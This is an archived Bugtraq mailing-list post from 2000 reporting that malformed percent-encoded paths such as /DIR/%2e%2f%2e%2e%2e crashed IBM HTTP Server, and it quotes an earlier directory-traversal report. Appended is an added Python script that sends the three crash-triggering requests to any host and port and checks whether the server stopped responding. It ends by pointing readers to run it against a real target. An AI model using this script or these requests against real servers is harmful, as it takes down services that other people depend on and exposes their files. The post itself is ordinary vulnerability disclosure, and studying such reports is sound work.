[15158] in bugtraq
Re: IBM HTTP SERVER / APACHE (DoS)
daemon@ATHENA.MIT.EDU (H D Moore)
Thu Jun 1 22:38:49 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3936803B.8036C277@secureaustin.com>
Date: Thu, 1 Jun 2000 10:24:43 -0500
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Marek Roy <marek_roy@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
While I was poking around looking for more vulnerabilities, I noticed
that sending a request like:
GET /DIR/.../ HTTP/1.0
would give me the same response as GET /DIR/ HTTP/1.0
So I sent off a request that looked like this:
GET /DIR/%2e%2e%2e%00%2e%2e HTTP/1.0
and the server told me /DIR/... was not found...
And finally I tried:
GET /DIR/%2e%2f%2e%2e%2e HTTP/1.0
And the server simply crashed, burned, and stopped accepting
connections. Whether the DoS was triggered by the earlier request
containing the null character or the single %2e%2f sequence is unknown.
Since I did not have access to the test machine's console, I don't know
what the impact besides the obvious DoS is...
Anyone running one of these and feel like playing?
-HD
http://www.secureaustin.com (spidermap/nlog/etc)
Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
>
> There is a crucial number of "/" (forward slash) you can
> use to retrieve the contents of the root directory of this
> particular Web Server. Using this vulnerability, you can
> retrieve any files or scripts running from that directory
> and sub-directories.
[ snip ]
> Marek Roy
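The following is an added example and not code from either poster. It reproduces the three raw HTTP/1.0 request lines from H D Moore's message, sends them one after another to a host and port you supply, and reports the status line each one got back together with whether the server still accepts connections afterwards (the post's observed failure mode). The decoded_view() helper is an assumption, not a description of IBM HTTP Server internals: it models a server that percent-decodes the path, truncates at the first NUL as a C string would, and then drops "." segments, which is one way to account for the post's observation that the %00 and %2e%2f variants were both reported as /DIR/... . The stub server and the DIR directory name are constructed for a local, offline run.

```python
import socket
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_requests(directory="DIR"):
    """The three request lines from the post, as raw HTTP/1.0 bytes (no Host header,
    as the post sent them). The directory name is a placeholder."""
    paths = [
        f"/{directory}/.../",
        f"/{directory}/%2e%2e%2e%00%2e%2e",
        f"/{directory}/%2e%2f%2e%2e%2e",
    ]
    return [f"GET {p} HTTP/1.0\r\n\r\n".encode("ascii") for p in paths]


def decoded_view(path):
    """Assumed model only: percent-decode, cut at the first NUL (C-string truncation),
    then collapse '.' and '..' segments. Three literal dots are an ordinary name."""
    raw = urllib.parse.unquote(path).split("\x00", 1)[0]
    parts = []
    for seg in raw.split("/"):
        if seg == ".":
            continue
        if seg == "..":
            if len(parts) > 1:          # never pop the leading root marker
                parts.pop()
            continue
        parts.append(seg)
    return "/".join(parts)


def send_raw(host, port, raw, timeout=3.0):
    """Send one raw request and return its status line, or None if the server
    refused the connection or closed it without answering."""
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(raw)
            while b"\r\n" not in data:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    except OSError:
        return None
    line = data.split(b"\r\n", 1)[0]
    return line.decode("latin-1") if line else None


def probe(host, port, directory="DIR"):
    """Send the three requests in the post's order. Returns a list of
    (request line, status line or None) and a final liveness flag."""
    results = []
    for raw in build_requests(directory):
        request_line = raw.split(b"\r\n", 1)[0].decode("ascii")
        results.append((request_line, send_raw(host, port, raw)))
    alive = send_raw(host, port, b"GET / HTTP/1.0\r\n\r\n") is not None
    return results, alive


class _StubHandler(BaseHTTPRequestHandler):
    """Constructed stand-in target: 200 for '/', 404 for everything else."""
    def do_GET(self):
        self.send_response(200 if self.path == "/" else 404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass


def run_demo():
    """Start the stub on a loopback port, probe it, shut it down."""
    server = HTTPServer(("127.0.0.1", 0), _StubHandler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", port)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    results, alive = run_demo()
    for request_line, status in results:
        print(f"{request_line!r:45} -> {status}   (decoded model: "
              f"{decoded_view(request_line.split(' ')[1])})")
    print("server still accepting connections:", alive)
```

Against a real target, call probe(host, port) directly; a None status or alive == False after the third request is the behaviour the post describes, and the order of the requests matters because the post could not tell whether the %00 request or the %2e%2f one was the trigger.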